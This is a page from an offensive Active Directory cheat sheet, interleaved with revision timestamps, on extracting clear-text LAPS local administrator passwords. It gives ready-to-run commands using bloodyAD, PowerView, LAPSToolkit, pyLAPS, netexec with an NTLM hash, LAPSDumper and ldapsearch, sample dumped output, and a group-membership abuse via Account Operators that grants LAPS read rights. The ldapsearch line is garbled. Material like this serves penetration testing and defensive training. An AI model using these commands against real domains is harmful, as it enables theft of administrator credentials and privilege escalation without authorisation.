2023-12-03 11:17:02 +00:00
# Password - LAPS
## Reading LAPS Password
> Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure.
### Determine if LAPS is installed
```ps1
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll'
Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
```
### Extract LAPS password
> The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users
2024-01-11 15:58:09 +00:00
- Windows/Linux:
```ps1
bloodyAD -u john.doe -d bloody.lab -p Password512 --host 192.168.10.2 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
```
2023-12-03 11:17:02 +00:00
- From Windows:
* adsisearcher (native binary on Windows 8+)
```powershell
([adsisearcher]"(& (objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties}
([adsisearcher]"(& (objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties}
```
* [PowerView ](https://github.com/PowerShellEmpire/PowerTools )
```powershell
PS > Import-Module .\PowerView.ps1
PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
```
* [LAPSToolkit ](https://github.com/leoloobeek/LAPSToolkit )
```powershell
$ Get-LAPSComputers
ComputerName Password Expiration
------------ -------- ----------
example.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18
$ Find-LAPSDelegatedGroups
$ Find-AdmPwdExtendedRights
```
* Powershell AdmPwd.PS
```powershell
foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
```
- From Linux:
* [pyLAPS ](https://github.com/p0dalirius/pyLAPS ) to **read** and **write** LAPS passwords:
```bash
# Read the password of all computers
./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
# Write a random password to a specific computer
./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1
```
2024-03-29 21:24:52 +00:00
* [netexec ](https://github.com/Pennyw0rth/NetExec ):
2023-12-03 11:17:02 +00:00
```bash
2024-03-29 21:24:52 +00:00
netexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps
2023-12-03 11:17:02 +00:00
```
* [LAPSDumper ](https://github.com/n00py/LAPSDumper )
```bash
python laps.py -u 'user' -p 'password' -d 'domain.local'
python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local'
```
* ldapsearch
```bash
ldapsearch -x -h < >,dc=< >,dc=< >" "(& (objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
```
### Grant LAPS Access
The members of the group ** "Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
```ps1
Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
2024-05-24 08:48:55 +00:00
```
## References
* [Training - Attacking and Defending Active Directory Lab - Altered Security ](https://www.alteredsecurity.com/adlab )
